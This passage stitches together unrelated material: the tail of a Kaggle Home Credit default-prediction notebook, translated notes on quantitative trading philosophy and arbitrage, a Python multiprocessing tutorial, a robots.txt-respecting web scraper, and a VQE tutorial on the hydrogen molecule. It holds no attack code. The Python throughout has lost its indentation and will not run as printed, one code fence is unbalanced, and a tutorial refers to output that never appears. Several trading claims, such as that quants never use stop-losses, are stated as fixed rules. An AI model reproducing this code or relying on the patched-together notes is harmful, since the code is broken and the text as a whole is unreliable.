test = imputer.transform(test)
scaler = MinMaxScaler(feature_range = (0, 1))
scaler.fit(train)
train = scaler.transform(train)
test = scaler.transform(test)
log_reg = LogisticRegression(C = 0.0001)
log_reg.fit(train, labels)
log_reg_pred = log_reg.predict_proba(test)[:, 1]
submit = test_df[['SK_ID_CURR']]
submit['TARGET'] = log_reg_pred
submit.to_csv('log_reg.csv', index = False)
random_forest = RandomForestClassifier(n_estimators = 100, random_state = 50, verbose = 1, n_jobs = -1)
random_forest.fit(train, labels)
predictions = random_forest.predict_proba(test)[:, 1]
del train, test
gc.collect()
submit = test_df[['SK_ID_CURR']]
submit['TARGET'] = predictions
del predictions
submit.to_csv('random_forest.csv', index = False)
del submit
gc.collect()
# Ref: https://pranaysite.netlify.app/lightgbm/
def model(features, test_features, encoding = 'ohe', n_folds = 5):
"""Train and test a light gradient boosting model using
cross validation.
Parameters
--------
features (pd.DataFrame):
dataframe of training features to use
for training a model. Must include the TARGET column.
test_features (pd.DataFrame):
dataframe of testing features to use
for making predictions with the model.
encoding (str, default = 'ohe'):
method for encoding categorical variables. Either 'ohe' for one-hot encoding or 'le' for integer label encoding
n_folds (int, default = 5): number of folds to use for cross validation
Return
--------
submission (pd.DataFrame):
dataframe with `SK_ID_CURR` and `TARGET` probabilities
predicted by the model.
feature_importances (pd.DataFrame):
dataframe with the feature importances from the model.
valid_metrics (pd.DataFrame):
dataframe with training and validation metrics (ROC AUC) for each fold and overall.
"""
# Extract the ids
train_ids = features['SK_ID_CURR']
test_ids = test_features['SK_ID_CURR']
# Extract the labels for training
labels = features['TARGET']
# Remove the ids and target
features = features.drop(columns = ['SK_ID_CURR', 'TARGET'])
test_features = test_features.drop(columns = ['SK_ID_CURR'])
# One Hot Encoding
if encoding == 'ohe':
features = pd.get_dummies(features)
test_features = pd.get_dummies(test_features)
# Align the dataframes by the columns
features, test_features = features.align(test_features, join = 'inner', axis = 1)
# No categorical indices to record
cat_indices = 'auto'
# Integer label encoding
elif encoding == 'le':
# Create a label encoder
label_encoder = LabelEncoder()
# List for storing categorical indices
cat_indices = []
# Iterate through each column
for i, col in enumerate(features):
if features[col].dtype == 'object':
# Map the categorical features to integers
features[col] = label_encoder.fit_transform(np.array(features[col].astype(str)).reshape((-1,)))
test_features[col] = label_encoder.transform(np.array(test_features[col].astype(str)).reshape((-1,)))
# Record the categorical indices
cat_indices.append(i)
# Catch error if label encoding scheme is not valid
else:
raise ValueError("Encoding must be either 'ohe' or 'le'")
print('Training Data Shape: ', features.shape)
print('Testing Data Shape: ', test_features.shape)
# Extract feature names
feature_names = list(features.columns)
# Convert to np arrays
features = np.array(features)
test_features = np.array(test_features)
# Create the kfold object
k_fold = KFold(n_splits = n_folds, shuffle = True, random_state = 50)
# Empty array for feature importances
feature_importance_values = np.zeros(len(feature_names))
# Empty array for test predictions
test_predictions = np.zeros(test_features.shape[0])
# Empty array for out of fold validation predictions
out_of_fold = np.zeros(features.shape[0])
# Lists for recording validation and training scores
valid_scores = []
train_scores = []
# Iterate through each fold
for train_indices, valid_indices in k_fold.split(features):
# Training data for the fold
train_features, train_labels = features[train_indices], labels[train_indices]
# Validation data for the fold
valid_features, valid_labels = features[valid_indices], labels[valid_indices]
# Create the model
model = lgb.LGBMClassifier(n_estimators=10000, objective = 'binary',
class_weight = 'balanced', learning_rate = 0.05,
reg_alpha = 0.1, reg_lambda = 0.1,
subsample = 0.8, n_jobs = -1, random_state = 50)
# Train the model
model.fit(train_features, train_labels, eval_metric = 'auc',
eval_set = [(valid_features, valid_labels), (train_features, train_labels)],
eval_names = ['valid', 'train'], categorical_feature = cat_indices,
early_stopping_rounds = 100, verbose = 200)
# Record the best iteration
best_iteration = model.best_iteration_
# Record the feature importances
feature_importance_values += model.feature_importances_ / k_fold.n_splits
# Make predictions
test_predictions += model.predict_proba(test_features, num_iteration = best_iteration)[:, 1] / k_fold.n_splits
# Record the out of fold predictions
out_of_fold[valid_indices] = model.predict_proba(valid_features, num_iteration = best_iteration)[:, 1]
# Record the best score
valid_score = model.best_score_['valid']['auc']
train_score = model.best_score_['train']['auc']
valid_scores.append(valid_score)
train_scores.append(train_score)
# Clean up memory
gc.enable()
del model, train_features, valid_features
gc.collect()
# Make the submission dataframe
submission = pd.DataFrame({'SK_ID_CURR': test_ids, 'TARGET': test_predictions})
# Make the feature importance dataframe
feature_importances = pd.DataFrame({'feature': feature_names, 'importance': feature_importance_values})
# Overall validation score
valid_auc = roc_auc_score(labels, out_of_fold)
# Add the overall scores to the metrics
valid_scores.append(valid_auc)
train_scores.append(np.mean(train_scores))
# Needed for creating dataframe of validation scores
fold_names = list(range(n_folds))
fold_names.append('overall')
# Dataframe of validation scores
metrics = pd.DataFrame({'fold': fold_names,
'train': train_scores,
'valid': valid_scores})
return submission, feature_importances, metrics
submission, fi, metrics = model(train_df, test_df, n_folds=5)
print('LightGBM metrics')
print(metrics)
def plot_feature_importances(df):
"""
Plot importances returned by a model. This can work with any measure of
feature importance provided that higher importance is better.
Args:
df (dataframe): feature importances. Must have the features in a column
called `feature` and the importances in a column called `importance`
Returns:
shows a plot of the 15 most important features
df (dataframe): feature importances sorted by importance (highest to lowest)
with a column for normalized importance
"""
# Sort features according to importance
df = df.sort_values('importance', ascending = False).reset_index()
# Normalize the feature importances to add up to one
df['importance_normalized'] = df['importance'] / df['importance'].sum()
# Make a horizontal bar chart of feature importances
plt.figure(figsize = (10, 6))
ax = plt.subplot()
# Need to reverse the index to plot most important on top
ax.barh(list(reversed(list(df.index[:15]))),
df['importance_normalized'].head(15),
align = 'center', edgecolor = 'k')
# Set the yticks and labels
ax.set_yticks(list(reversed(list(df.index[:15]))))
ax.set_yticklabels(df['feature'].head(15))
# Plot labeling
plt.xlabel('Normalized Importance'); plt.title('Feature Importances')
plt.show()
return df
fi_sorted = plot_feature_importances(fi)
submission.to_csv('lgb.csv', index = False)
del submission, fi, fi_sorted, metrics
gc.collect()
train_values = labels
train_id = train_df['SK_ID_CURR']
test_id = test_df['SK_ID_CURR']
train_df_xg = train_df.copy()
test_df_xg = test_df.copy()
train_df_xg.drop('SK_ID_CURR', inplace=True, axis=1)
test_df_xg.drop('SK_ID_CURR', inplace=True, axis=1)
train_df_xg, test_df_xg = train_df_xg.align(test_df_xg, join = 'inner', axis = 1)
ratio = (train_values == 0).sum()/ (train_values == 1).sum()
del train_df, test_df
gc.collect()
X_train, X_test, y_train, y_test = train_test_split(train_df_xg, train_values, test_size=0.2, stratify=train_values, random_state=1)
clf = XGBClassifier(n_estimators=1200, objective='binary:logistic', gamma=0.098, subsample=0.5, scale_pos_weight=ratio )
clf.fit(X_train, y_train, eval_set=[(X_test, y_test)], eval_metric='auc', early_stopping_rounds=10)
predictions = clf.predict_proba(test_df_xg.values)[:, 1]
submission = pd.DataFrame({'SK_ID_CURR': test_id.values, 'TARGET': predictions})
submission.to_csv('xgboost.csv', index = False)
!kaggle competitions submit home-credit-default-risk -f lgb.csv -m "Notebook Home Credit Loan | v6 | LightGBM"
#!kaggle competitions submit home-credit-default-risk -f xgboost.csv -m "Notebook Home Credit Loan | v5 | XGBoost"
#!kaggle competitions submit home-credit-default-risk -f log_reg.csv -m "Notebook Home Credit Loan | v5 | LogisticRegression"
#!kaggle competitions submit home-credit-default-risk -f random_forest.csv -m "Notebook Home Credit Loan | v5 | RandomForest"
```
- GF Securities (广发证券), 《深度学习之股指期货日内交易策略》 ("Deep Learning for Intraday Trading Strategies on Stock Index Futures")
- 《宽客人生》 ("My Life as a Quant")
- 《主动投资组合管理》 ("Active Portfolio Management")
-------------------------------------------------------
Quant research reports are mostly produced to satisfy clients; they are of little use for actual trading
A strategy's parameters with respect to the market are changing at every moment
Only a strategy plus its corresponding parameter adjustment makes a complete whole
The strategy itself also needs very strong discretionary adjustment ----------Zhou Jie (周杰)
Getting hold of a static strategy is not a master key; it says little about the details, and making money depends entirely on the details
There is no immutable trading system in this world that can make you money forever
-------------------------------------------------------
**Quant frameworks:**
Pricing framework: BSM option pricing, fundamentals-based equity pricing......
Factor framework: derived from CAPM theory; extracts information by running linear regressions on signal elements
Product framework: most commonly FOF and MOM
Arbitrage framework: a family of strategies built through cointegration
Fixed-income framework: trading the money, FX, and bond markets based on yield-derived concepts
High-frequency framework: built on evidence from market microstructure
Deep learning is not a standalone strategy system; it is a research method
----------------------------------------------------------------------
--->Theory first
--->Reject information primitives
--->Continuity & convergence
--->The market is incomplete
--->Predictiveness vs. representativeness
--->How a strategy is falsified
--->Strategy traps
* Quantitative trading is not a pile of numbers seen from the computer's point of view; the fact is, quantitative trading is rooted in theory
* Discovering and using information makes up the concrete logic of trading as a whole
* An information primitive is a unit of market information that cannot be subdivided any further
* Information units are continuous and convergent. When mining factors, "continuous" means the factor stays effective (or stays ineffective) over a stretch of time; the process need not be linear
* "Convergent" means that scaling the factor up or down in one direction must hit an extremum somewhere. Monotonicity is not required, but an extremum is: turn it up a little and performance improves, turn it up a little more and it improves again, and then at some value the improvement stops; that is the extremum, i.e. convergence. If a factor's returns keep growing without bound as you scale it up, that factor must be wrong
* All effective information units are continuous and convergent
* The market is incomplete
* Truly effective factors are kept secret; they must never be something the whole market already knows. An amusing example: using the day's first candlestick to predict that day's move (this factor is certainly useless)
* When the weather turns hot, more girls on the street wear skirts, but you cannot predict tomorrow's temperature from the number of girls wearing skirts. Temperature and the number of skirt wearers are linked only representatively, not predictively; keep this distinction strict
* Monotonicity of a function: as the independent variable of f(x) increases (or decreases) within an interval of its domain, the value f(x) also increases (or decreases); the function is then said to be monotonic on that interval
* Continuity of a function: a continuous function y = f(x) is one where a small change in the independent variable x causes only a small change in the dependent variable y; the dependent variable varies continuously with the independent variable, and the graph in Cartesian coordinates is a single unbroken curve
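The convergence test described above can be sketched numerically. Everything below is synthetic and hypothetical: the returns, the noisy signal, and the average-P&L metric are placeholders. The idea is to sweep an entry threshold and check that performance peaks at an interior value instead of improving without bound.

```python
import numpy as np

# Synthetic asset returns and a noisy signal that weakly predicts them.
rng = np.random.default_rng(0)
returns = rng.normal(0, 0.01, 5000)
signal = returns + rng.normal(0, 0.02, 5000)

def avg_pnl_per_trade(threshold):
    # Trade only when the signal is strong enough; a larger threshold
    # means fewer but (hopefully) better trades.
    position = np.where(np.abs(signal) > threshold, np.sign(signal), 0.0)
    n_trades = max(int((position != 0).sum()), 1)
    return float((position * returns).sum()) / n_trades

# Sweep the threshold: a sound factor should show an interior peak,
# not performance that keeps rising as the parameter is pushed further.
thresholds = np.linspace(0.0, 0.1, 51)
scores = [avg_pnl_per_trade(t) for t in thresholds]
best = thresholds[int(np.argmax(scores))]
print('best threshold:', round(float(best), 3))
```

If the best score sat at the edge of the sweep and kept improving as the range was extended, that would be exactly the non-convergent behavior the note warns against.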
-----------------------------------------------------------------------------------------
**Research methodology for quantitative trading**
Everything follows a playbook
A methodology is your working steps and requirements; think of it as an operating manual for what to do at every moment within any framework
Once the methodology is clear, you know what to do at every moment of every day; yet no book or course on the market teaches quant research methodology, and everyone has to distill their own
Putting methodology first in your research will save you many detours
----------------------------------------------------------------------------------------------------------------------------------------------------------
**Arbitrage**
Intrinsic arbitrage
* Cash-futures (basis) arbitrage
* Calendar-spread arbitrage
* Cross-market arbitrage
* Industry-chain arbitrage
Correlation arbitrage
* Cross-product arbitrage
* Derivatives arbitrage
1. Estimate the historical linear relationship between cu and ni prices
2. Choose a significance level, usually **α** = 5%
3. Assume the residuals are normally distributed and compute the confidence interval
4. Use the upper and lower bounds of the confidence interval as the entry thresholds
5. Open a short position on a break above the upper bound, a long position on a break below the lower bound
Mean reversion
Extreme-value capture
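Steps 1-5 can be sketched on simulated data. The `cu` and `ni` series below are random placeholders rather than real copper and nickel prices, and the residual model is the plain OLS-plus-normality assumption stated above.

```python
import numpy as np

# Simulated prices: ni is a random walk, cu tracks it linearly plus noise.
rng = np.random.default_rng(42)
ni = np.cumsum(rng.normal(0, 1, 500)) + 100
cu = 2.5 * ni + rng.normal(0, 3, 500)

# 1. Historical linear relationship between cu and ni
beta, alpha = np.polyfit(ni, cu, 1)
residual = cu - (alpha + beta * ni)

# 2.-3. At significance level 5%, with residuals assumed normal, the
# two-sided confidence interval is mean +/- 1.96 standard deviations.
mu, sigma = residual.mean(), residual.std()
upper, lower = mu + 1.96 * sigma, mu - 1.96 * sigma

# 4.-5. Use the bounds as entry thresholds: short the spread above the
# upper bound, long it below the lower bound, flat in between.
position = np.where(residual > upper, -1, np.where(residual < lower, 1, 0))
print('entries triggered:', int((position != 0).sum()))
```

In practice the relationship would be estimated on a rolling window and checked for cointegration before the thresholds are trusted.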
---------------------------------------------------------------------
Quants use neither take-profit nor stop-loss
A strategy must be a strict closed loop: has the current drawdown exceeded the room the model allows for?
Take-profit and stop-loss belong to discretionary trading; at the quantitative level they are a false proposition
Before a trade is entered you must know how likely it is to win, how likely it is to lose, and what the overall expectation is
Only when the probabilities of up and down moves are worked out beforehand does it count as quantitative; this can be a single probability or a whole distribution
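The pre-trade expectation check is simple arithmetic; the win rate and payoff figures below are invented for illustration.

```python
# Hypothetical estimates, expressed in risk units (R), that would have
# to be produced by the model before the order is sent.
p_win, avg_win = 0.45, 1.8    # probability of winning, average profit
p_loss, avg_loss = 0.55, 1.0  # probability of losing, average loss

# Expected value per trade: take the trade only if this is positive.
expectancy = p_win * avg_win - p_loss * avg_loss
print('expected value per trade: {:.2f}R'.format(expectancy))  # 0.26R
```

A fuller version would replace the two point estimates with the whole distribution of outcomes, as the note suggests.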
--------------------------------------------
**Mathematics to study:**
* Stochastic process analysis
* Time series
* AI
Build your own philosophical cornerstone
-------------------------------------------------------------
**Black and white swans**
Every risk you can observe is a white swan
Before negative oil prices first occurred they were a black swan; after they occurred they no longer are
Aliens invading Earth tomorrow would be a black swan
Black swans should be handled at the risk-control layer, not at the strategy layer
-------------------------------------------------------------
## Passing Messages to Processes
As with threads, a common use pattern for multiple processes is to divide a job up among several workers to run in parallel. Effective use of multiple processes usually requires some communication between them, so that work can be divided and results can be aggregated. A simple way to communicate between processes with multiprocessing is to use a Queue to pass messages back and forth. **Any object that can be serialized with pickle can pass through a Queue.**
```
import multiprocessing
class MyFancyClass:
def __init__(self, name):
self.name = name
def do_something(self):
proc_name = multiprocessing.current_process().name
print('Doing something fancy in {} for {}!'.format(
proc_name, self.name))
def worker(q):
obj = q.get()
obj.do_something()
if __name__ == '__main__':
queue = multiprocessing.Queue()
p = multiprocessing.Process(target=worker, args=(queue,))
p.start()
queue.put(MyFancyClass('Fancy Dan'))
# Wait for the worker to finish
queue.close()
queue.join_thread()
p.join()
```
A more complex example shows how to manage several workers consuming data from a JoinableQueue and passing results back to the parent process. The poison pill technique is used to stop the workers. After setting up the real tasks, the main program adds one “stop” value per worker to the job queue. When a worker encounters the special value, it breaks out of its processing loop. The main process uses the task queue’s join() method to wait for all of the tasks to finish before processing the results.
```
import multiprocessing
import time
class Consumer(multiprocessing.Process):
def __init__(self, task_queue, result_queue):
multiprocessing.Process.__init__(self)
self.task_queue = task_queue
self.result_queue = result_queue
def run(self):
proc_name = self.name
while True:
next_task = self.task_queue.get()
if next_task is None:
# Poison pill means shutdown
print('{}: Exiting'.format(proc_name))
self.task_queue.task_done()
break
print('{}: {}'.format(proc_name, next_task))
answer = next_task()
self.task_queue.task_done()
self.result_queue.put(answer)
class Task:
def __init__(self, a, b):
self.a = a
self.b = b
def __call__(self):
time.sleep(0.1) # pretend to take time to do the work
return '{self.a} * {self.b} = {product}'.format(
self=self, product=self.a * self.b)
def __str__(self):
return '{self.a} * {self.b}'.format(self=self)
if __name__ == '__main__':
# Establish communication queues
tasks = multiprocessing.JoinableQueue()
results = multiprocessing.Queue()
# Start consumers
num_consumers = multiprocessing.cpu_count() * 2
print('Creating {} consumers'.format(num_consumers))
consumers = [
Consumer(tasks, results)
for i in range(num_consumers)
]
for w in consumers:
w.start()
# Enqueue jobs
num_jobs = 10
for i in range(num_jobs):
tasks.put(Task(i, i))
# Add a poison pill for each consumer
for i in range(num_consumers):
tasks.put(None)
# Wait for all of the tasks to finish
tasks.join()
# Start printing results
while num_jobs:
result = results.get()
print('Result:', result)
num_jobs -= 1
```
## Signaling between Processes
The Event class provides a simple way to communicate state information between processes. An event can be toggled between set and unset states. Users of the event object can wait for it to change from unset to set, using an optional timeout value.
```
import multiprocessing
import time
def wait_for_event(e):
"""Wait for the event to be set before doing anything"""
print('wait_for_event: starting')
e.wait()
print('wait_for_event: e.is_set()->', e.is_set())
def wait_for_event_timeout(e, t):
"""Wait t seconds and then timeout"""
print('wait_for_event_timeout: starting')
e.wait(t)
print('wait_for_event_timeout: e.is_set()->', e.is_set())
if __name__ == '__main__':
e = multiprocessing.Event()
w1 = multiprocessing.Process(
name='block',
target=wait_for_event,
args=(e,),
)
w1.start()
w2 = multiprocessing.Process(
name='nonblock',
target=wait_for_event_timeout,
args=(e, 2),
)
w2.start()
print('main: waiting before calling Event.set()')
time.sleep(3)
e.set()
print('main: event is set')
```
* When wait() times out, it returns without an error. The caller is responsible for checking the state of the event using is_set().
* A single event.set() wakes up every process that is waiting on that event.
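As a small, self-contained illustration of the timeout behavior (run in a single process for brevity): in Python 3, wait() returns the flag state, the same value is_set() would report, so a False return indicates a timeout.

```python
import multiprocessing

e = multiprocessing.Event()
# No one sets the event, so this wait times out and returns False
flag_before = e.wait(timeout=0.1)
e.set()
# The event is now set, so wait() returns True immediately
flag_after = e.wait(timeout=0.1)
print(flag_before, flag_after)
```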
## Controlling Access to Resources
In situations when a single resource needs to be shared between multiple processes, a Lock can be used to avoid conflicting accesses.
```
import multiprocessing
import sys
def worker_with(lock, stream):
with lock:
stream.write('Lock acquired via with\n')
def worker_no_with(lock, stream):
lock.acquire()
try:
stream.write('Lock acquired directly\n')
finally:
lock.release()
lock = multiprocessing.Lock()
w = multiprocessing.Process(
target=worker_with,
args=(lock, sys.stdout),
)
nw = multiprocessing.Process(
target=worker_no_with,
args=(lock, sys.stdout),
)
w.start()
nw.start()
w.join()
nw.join()
```
## Synchronizing Operations
### Condition
Condition objects can be used to synchronize parts of a workflow so that some run in parallel but others run sequentially, even if they are in separate processes.
```
import multiprocessing
import time
def stage_1(cond):
"""perform first stage of work,
then notify stage_2 to continue
"""
name = multiprocessing.current_process().name
print('Starting', name)
with cond:
print('{} done and ready for stage 2'.format(name))
cond.notify_all()
def stage_2(cond):
"""wait for the condition telling us stage_1 is done"""
name = multiprocessing.current_process().name
print('Starting', name)
with cond:
cond.wait()
print('{} running'.format(name))
if __name__ == '__main__':
condition = multiprocessing.Condition()
s1 = multiprocessing.Process(name='s1',
target=stage_1,
args=(condition,))
s2_clients = [
multiprocessing.Process(
name='stage_2[{}]'.format(i),
target=stage_2,
args=(condition,),
)
for i in range(1, 3)
]
for c in s2_clients:
c.start()
time.sleep(1)
s1.start()
s1.join()
for c in s2_clients:
c.join()
```
In this example, two processes run the second stage of a job in parallel, but only after the first stage is done.
## Controlling Concurrent Access to Resources
Sometimes it is useful to allow more than one worker access to a resource at a time, while still limiting the overall number. For example, a connection pool might support a fixed number of simultaneous connections, or a network application might support a fixed number of concurrent downloads. A Semaphore is one way to manage those connections.
```
import random
import multiprocessing
import time
class ActivePool:
def __init__(self):
super(ActivePool, self).__init__()
self.mgr = multiprocessing.Manager()
self.active = self.mgr.list()
self.lock = multiprocessing.Lock()
def makeActive(self, name):
with self.lock:
self.active.append(name)
def makeInactive(self, name):
with self.lock:
self.active.remove(name)
def __str__(self):
with self.lock:
return str(self.active)
def worker(s, pool):
name = multiprocessing.current_process().name
with s:
pool.makeActive(name)
print('Activating {} now running {}'.format(
name, pool))
time.sleep(random.random())
pool.makeInactive(name)
if __name__ == '__main__':
pool = ActivePool()
s = multiprocessing.Semaphore(3)
jobs = [
multiprocessing.Process(
target=worker,
name=str(i),
args=(s, pool),
)
for i in range(10)
]
for j in jobs:
j.start()
while True:
alive = 0
for j in jobs:
if j.is_alive():
alive += 1
j.join(timeout=0.1)
print('Now running {}'.format(pool))
if alive == 0:
# all done
break
```
## Managing Shared State
In the previous example, the list of active processes is maintained centrally in the ActivePool instance via a special type of list object created by a Manager. The Manager is responsible for coordinating shared information state between all of its users.
```
import multiprocessing
import pprint
def worker(d, key, value):
d[key] = value
if __name__ == '__main__':
mgr = multiprocessing.Manager()
d = mgr.dict()
jobs = [
multiprocessing.Process(
target=worker,
args=(d, i, i * 2),
)
for i in range(10)
]
for j in jobs:
j.start()
for j in jobs:
j.join()
print('Results:', d)
```
By creating the dictionary through the manager, it is shared, and updates are seen in all processes. Lists are also supported.
## Shared Namespaces
In addition to dictionaries and lists, a Manager can create a shared Namespace.
```
import multiprocessing
def producer(ns, event):
ns.value = 'This is the value'
event.set()
def consumer(ns, event):
try:
print('Before event: {}'.format(ns.value))
except Exception as err:
print('Before event, error:', str(err))
event.wait()
print('After event:', ns.value)
if __name__ == '__main__':
mgr = multiprocessing.Manager()
namespace = mgr.Namespace()
event = multiprocessing.Event()
p = multiprocessing.Process(
target=producer,
args=(namespace, event),
)
c = multiprocessing.Process(
target=consumer,
args=(namespace, event),
)
c.start()
p.start()
c.join()
p.join()
```
Any named value added to the Namespace is visible to all of the clients that receive the Namespace instance.
**It is important to know that updates to the contents of mutable values in the namespace are not propagated automatically.**
```
import multiprocessing
def producer(ns, event):
# DOES NOT UPDATE GLOBAL VALUE!
ns.my_list.append('This is the value')
event.set()
def consumer(ns, event):
print('Before event:', ns.my_list)
event.wait()
print('After event :', ns.my_list)
if __name__ == '__main__':
mgr = multiprocessing.Manager()
namespace = mgr.Namespace()
namespace.my_list = []
event = multiprocessing.Event()
p = multiprocessing.Process(
target=producer,
args=(namespace, event),
)
c = multiprocessing.Process(
target=consumer,
args=(namespace, event),
)
c.start()
p.start()
c.join()
p.join()
```
## Process Pools
The Pool class can be used to manage a fixed number of workers for simple cases where the work to be done can be broken up and distributed between workers independently. The return values from the jobs are collected and returned as a list. The pool arguments include the number of processes and a function to run when starting the task process (invoked once per child).
```
import multiprocessing
def do_calculation(data):
return data * 2
def start_process():
print('Starting', multiprocessing.current_process().name)
if __name__ == '__main__':
inputs = list(range(10))
print('Input :', inputs)
builtin_outputs = map(do_calculation, inputs)
print('Built-in:', [i for i in builtin_outputs])
pool_size = multiprocessing.cpu_count() * 2
pool = multiprocessing.Pool(
processes=pool_size,
initializer=start_process,
)
pool_outputs = pool.map(do_calculation, inputs)
pool.close() # no more tasks
pool.join() # wrap up current tasks
print('Pool :', pool_outputs)
```
By default, Pool creates a fixed number of worker processes and passes jobs to them until there are no more jobs. Setting the maxtasksperchild parameter tells the pool to restart a worker process after it has finished a few tasks, preventing long-running workers from consuming ever more system resources.
```
import multiprocessing
def do_calculation(data):
return data * 2
def start_process():
print('Starting', multiprocessing.current_process().name)
if __name__ == '__main__':
inputs = list(range(10))
print('Input :', inputs)
builtin_outputs = map(do_calculation, inputs)
    print('Built-in:', list(builtin_outputs))
pool_size = multiprocessing.cpu_count() * 2
pool = multiprocessing.Pool(
processes=pool_size,
initializer=start_process,
maxtasksperchild=2,
)
pool_outputs = pool.map(do_calculation, inputs)
pool.close() # no more tasks
pool.join() # wrap up current tasks
print('Pool :', pool_outputs)
```
The pool restarts the workers when they have completed their allotted tasks, even if there is no more work. In this output, eight workers are created, even though there are only 10 tasks, and each worker is replaced after completing two of them.
```
import urllib.request as urlreq
import urllib.error as urlerr
import urllib.parse as urlparse
import urllib.robotparser as urlrp
from bs4 import BeautifulSoup
import re
import datetime
import time
import sys
sys.path.append('../')
from common.utils import *
url = "http://example.webscraping.com/places/default/view/Argentina-11"
html = download(url)
soup = BeautifulSoup(html, "lxml")
trs = soup.find_all(attrs={'id':re.compile('places_.*__row')})
for tr in trs:
td = tr.find(attrs={'class':'w2p_fw'})
value = td.text
print(value)
import lxml.html
tree = lxml.html.fromstring(html)
td = tree.cssselect('tr#places_area__row > td.w2p_fw')[0]
area = td.text_content()
print(area)
FIELDS = ('area', 'population', 'iso', 'country', 'capital', 'continent',
'tld', 'currency_code', 'currency_name', 'phone', 'postal_code_format',
'postal_code_regex', 'languages', 'neighbours')
def re_scraper(html):
results = {}
for field in FIELDS:
results[field] = re.search('<tr id="places_%s__row">.*?<td class="w2p_fw">(.*?)<\/td>' % field, html.decode()).groups()[0]
return results
def bs_scraper(html):
soup = BeautifulSoup(html, "lxml")
results = {}
for field in FIELDS:
results[field] = soup.find('table').find('tr', id='places_%s__row' % field).find(
'td', class_='w2p_fw').text
return results
def lxml_scraper(html):
tree = lxml.html.fromstring(html)
results = {}
for field in FIELDS:
results[field] = tree.cssselect('table > tr#places_%s__row > td.w2p_fw' %
field)[0].text_content()
return results
import time
NUM_ITERATIONS = 1000
for name, scraper in [('Regular expressions', re_scraper),
('BeautifulSoup', bs_scraper),
('Lxml', lxml_scraper)]:
start = time.time()
for i in range(NUM_ITERATIONS):
if scraper == re_scraper:
re.purge()
result = scraper(html)
assert(result['area'] == '2,766,890 square kilometres')
end = time.time()
print("%s: %.2f seconds" % (name, end-start))
def scrape_callback(url, html):
if re.search('/view/', url):
tree = lxml.html.fromstring(html)
row = [tree.cssselect('table > tr#places_{}__row > td.w2p_fw'.format(field))[0].text_content() for field in FIELDS]
print(url, row)
import csv
class ScrapeCallback:
def __init__(self):
self.writer = csv.writer(open('countries.csv', 'w'))
self.fields = ('area', 'population', 'iso', 'country', 'capital', 'continent', 'tld', 'currency_code', 'currency_name', 'phone', 'postal_code_format', 'postal_code_regex', 'languages', 'neighbours')
self.writer.writerow(self.fields)
def __call__(self, url, html):
if re.search('/view/', url):
tree = lxml.html.fromstring(html)
row = []
for field in self.fields:
row.append(tree.cssselect('table > tr#places_{}__row > td.w2p_fw'.format(field))[0].text_content())
self.writer.writerow(row)
def link_crawler(seed_url, link_regex, max_depth=2, scrape_callback=None):
crawl_queue = [seed_url]
seen = {seed_url:0}
throttle = Throttle(3)
user_agent = 'victor'
rp = urlrp.RobotFileParser()
rp.set_url("http://example.webscraping.com/robots.txt")
rp.read()
while crawl_queue:
url = crawl_queue.pop()
depth = seen[url]
if rp.can_fetch(user_agent, url):
throttle.wait(url)
html = download(url, user_agent)
if scrape_callback:
scrape_callback(url, html)
if depth != max_depth:
for link in get_links(html.decode()):
# skip all login pages
if re.search('login|register', link):
continue
if re.search(link_regex, link):
# form absolute link
link = urlparse.urljoin(seed_url, link)
# check if this link is already seen
if link not in seen:
seen[link] = depth + 1
crawl_queue.append(link)
else:
print('blocked by robots.txt, ', url)
return seen
all_links = link_crawler('http://example.webscraping.com', '/(index|view)/', scrape_callback=scrape_callback)
all_links = link_crawler('http://example.webscraping.com', '/(index|view)/', scrape_callback=ScrapeCallback())
```
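As a self-contained illustration of what the scrapers above extract (using a small inline HTML snippet as a stand-in for the downloaded page), the regex variant reduces to:

```python
import re

# A minimal stand-in for one row of the country table
html = ('<table><tr id="places_area__row">'
        '<td class="w2p_fw">2,766,890 square kilometres</td></tr></table>')
match = re.search(
    r'<tr id="places_area__row">.*?<td class="w2p_fw">(.*?)</td>', html)
area = match.group(1)
print(area)
```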
# End-to-end quantum chemistry VQE using Qu & Co Chemistry
In this tutorial we show how to solve for the ground-state energy of a hydrogen molecule using VQE, as a function of the spacing between the atoms of the molecule. For a more detailed discussion of MolecularData generation or VQE settings, please refer to our other tutorials. Here we focus on the exact UCCSD method, which gives an upper bound on the performance of a UCCSD-based VQE approach. In reality, additional errors are incurred by Trotterizing the UCC Hamiltonian evolution.
```
from openfermion.hamiltonians import MolecularData
from qucochemistry.vqe import VQEexperiment
from openfermionpyscf import run_pyscf
import numpy as np
#H2 spacing
spacing =np.array([0.1,0.15,0.2,0.25,0.3,0.4,0.5,0.6,0.7,0.74,0.75,0.8,0.85,0.9,1.0,1.1,1.2,1.3,1.4,1.5,1.6,1.7,1.8,1.9,2.0,2.2,2.4,2.6,2.8,3.0])
M=len(spacing)
# Set molecule parameters and desired basis.
basis = 'sto-3g'
multiplicity = 1
# Set calculation parameters.
run_scf = 1
run_mp2 = 1
run_cisd = 1
run_ccsd = 1
run_fci = 1
E_fci=np.zeros([M,1])
E_hf=np.zeros([M,1])
E_ccsd=np.zeros([M,1])
E_uccsd=np.zeros([M,1])
E_uccsd_opt=np.zeros([M,1])
for i, space in enumerate(spacing):
#construct molecule data storage object
geometry = [('H', (0., 0., 0.)), ('H', (0., 0., space))]
molecule = MolecularData(geometry, basis, multiplicity,description='pyscf_H2_' + str(space*100))
molecule.filename = 'molecules/H2/H2_pyscf_' + str(space)[0] +'_' +str(space)[2:] #location of the .hdf5 file to store the data in
# Run PySCF to add the data.
molecule = run_pyscf(molecule,
run_scf=run_scf,
run_mp2=run_mp2,
run_cisd=run_cisd,
run_ccsd=run_ccsd,
run_fci=run_fci)
vqe = VQEexperiment(molecule=molecule,method='linalg', strategy='UCCSD')
E_uccsd[i]=vqe.objective_function()
vqe.start_vqe()
E_uccsd_opt[i]=vqe.get_results().fun
E_fci[i]=float(molecule.fci_energy)
E_hf[i]=float(molecule.hf_energy)
E_ccsd[i]=float(molecule.ccsd_energy)
```
We compare the results for 5 different strategies: classical HF, CCSD, and FCI, together with a quantum unitary variant of CCSD called UCCSD, and its optimized version. In other words, we calculate the Hamiltonian expectation value for a wavefunction which was propagated by a UCCSD ansatz with CCSD amplitudes. We then run an optimization algorithm over these starting amplitudes in order to get even closer to the true ground state, thereby minimizing the energy.
In essence, with the method='linalg' option, we do not create a quantum circuit, but rather directly take the matrix exponential of the UCC-Hamiltonian. In reality, for a gate-based architecture, one would need to select a Trotterization protocol to execute this action on a QPU, incurring Trotterization errors along the way.
